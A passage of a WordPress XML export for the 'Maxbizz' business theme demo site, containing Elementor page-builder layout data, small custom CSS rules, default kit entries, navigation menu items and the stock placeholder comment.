management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"22153473","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2b9fdc68","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a136c0a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"199198b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"66dcf71a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18b9835e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5aa06968","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4283666a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/maxbizz/</link>
		<pubDate>Fri, 02 Oct 2020 03:26:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/maxbizz/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1210</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 03:26:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 03:26:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit-2-2</link>
		<pubDate>Thu, 03 Sep 2020 08:41:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1290</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:41:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:41:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit-2-3</link>
		<pubDate>Mon, 19 Oct 2020 03:06:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1431</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 03:06:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 03:06:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/maxbizz-2/</link>
		<pubDate>Mon, 26 Oct 2020 03:09:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/26/maxbizz-2/</guid>
		<description></description>
		<content:encoded><![CDATA[.widget .recent-news h6{
	font-size: 17px;
}
.post-nav .info-post h6{
	font-size: 18px;
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1533</wp:post_id>
		<wp:post_date><![CDATA[2020-10-26 03:09:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-26 03:09:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit-2</link>
		<pubDate>Mon, 02 Nov 2020 03:58:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1702</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 03:58:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{s:9:"site_name";s:16:"Maxbizz Business";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:comment>
			<wp:comment_id>2</wp:comment_id>
			<wp:comment_author><![CDATA[A WordPress Commenter]]></wp:comment_author>
			<wp:comment_author_email><![CDATA[wapuu@wordpress.example]]></wp:comment_author_email>
			<wp:comment_author_url>https://wordpress.org/</wp:comment_author_url>
			<wp:comment_author_IP><![CDATA[]]></wp:comment_author_IP>
			<wp:comment_date><![CDATA[2020-11-02 03:58:36]]></wp:comment_date>
			<wp:comment_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:comment_date_gmt>
			<wp:comment_content><![CDATA[Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from <a href="https://gravatar.com" rel="nofollow ugc">Gravatar</a>.]]></wp:comment_content>
			<wp:comment_approved><![CDATA[1]]></wp:comment_approved>
			<wp:comment_type><![CDATA[comment]]></wp:comment_type>
			<wp:comment_parent>0</wp:comment_parent>
			<wp:comment_user_id>0</wp:comment_user_id>
							</wp:comment>
					</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/maxbizz-3/</link>
		<pubDate>Thu, 12 Nov 2020 08:06:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/12/maxbizz-3/</guid>
		<description></description>
		<content:encoded><![CDATA[@media (min-width: 1025px) {
	.team-form &gt; span.wpcf7-form-control-wrap{
		margin-right: 10px;
	}
	.team-form input[type=text], .team-form input[type=email]{
		width: 377px;
		max-width: 377px;
	}
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1958</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 08:06:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 08:06:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit</link>
		<pubDate>Mon, 09 Nov 2020 04:39:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2100</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:39:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:39:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{s:9:"site_name";s:17:"Maxbizz Corporate";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:comment>
			<wp:comment_id>3</wp:comment_id>
			<wp:comment_author><![CDATA[A WordPress Commenter]]></wp:comment_author>
			<wp:comment_author_email><![CDATA[wapuu@wordpress.example]]></wp:comment_author_email>
			<wp:comment_author_url>https://wordpress.org/</wp:comment_author_url>
			<wp:comment_author_IP><![CDATA[]]></wp:comment_author_IP>
			<wp:comment_date><![CDATA[2020-11-09 04:39:56]]></wp:comment_date>
			<wp:comment_date_gmt><![CDATA[2020-11-09 04:39:56]]></wp:comment_date_gmt>
			<wp:comment_content><![CDATA[Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from <a href="https://gravatar.com" rel="nofollow ugc">Gravatar</a>.]]></wp:comment_content>
			<wp:comment_approved><![CDATA[1]]></wp:comment_approved>
			<wp:comment_type><![CDATA[comment]]></wp:comment_type>
			<wp:comment_parent>0</wp:comment_parent>
			<wp:comment_user_id>0</wp:comment_user_id>
							</wp:comment>
					</item>
					<item>
		<title>Pages</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/pages/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/pages/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2102</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pages]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>2</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2104/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2104/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2104</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2104]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>3</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[487]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2105/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2105/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2105</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2105]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>12</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[597]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit-3</link>
		<pubDate>Fri, 13 Nov 2020 07:05:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/?elementor_library=default-kit-3</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
